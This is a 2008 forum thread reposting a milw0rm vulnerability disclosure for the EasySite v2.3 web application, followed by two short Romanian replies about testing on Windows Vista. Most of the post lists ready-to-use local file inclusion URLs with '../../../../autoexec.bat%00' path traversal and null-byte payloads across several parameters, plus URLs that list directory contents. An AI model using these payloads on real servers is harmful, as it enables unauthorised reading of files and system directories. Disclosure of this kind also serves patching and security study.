SirGod Posted August 21, 2008 Report Posted August 21, 2008 ####################################################################[+] EasySite v2.3 Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN####################################################################[+] Local File Inclusion[url]http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00[/url][url]http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00[/url][url]http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00[/url][url]http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00[/url][url]http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00[/url][url]http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00[/url][url]http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00[/url]And many others...This will open autoexec.bat[+] Arbitrary View Folder ContentsYou can view the folder contents and the content of files view via LFI. [url]http://localhost/www/index.php?module=../../../[/url] [url]http://localhost/inc/vmenu.php?module=../../../[/url]This will open C:/ directory and will show all the files from C:/ .Example : * BOOTSECT.BAK * BcBtRmv.log * IO.SYS * MSDOS.SYS * autoexec.bat * bootmgr * config.sys * grldr * hiberfil.sys * pagefile.sys##################################################################### milw0rm.com [2008-08-21] Quote
Guest Kenpachi Posted August 22, 2008 Report Posted August 22, 2008 tot tineam sa te intreb care e faza cu autoexec.bat , astea is softuri pt win ? sau le testezi tu pe win si d'aia ? Quote
SirGod Posted August 22, 2008 Author Report Posted August 22, 2008 autoexec.bat e pe Vista.Eu am vista,si le testez pe localhost.Nu stiu daca e si pe XP. Quote
